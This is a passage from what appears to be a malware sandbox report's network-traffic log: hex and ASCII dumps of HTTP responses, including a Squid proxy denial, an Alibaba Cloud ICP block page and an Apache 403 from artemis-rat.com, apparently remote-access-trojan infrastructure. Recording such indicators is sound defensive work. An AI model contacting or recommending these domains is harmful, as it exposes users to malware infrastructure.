73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:37 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:37 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:37 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailablecontent-length: 107cache-control: no-cachecontent-type: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:38 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:39 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:39 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 281Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 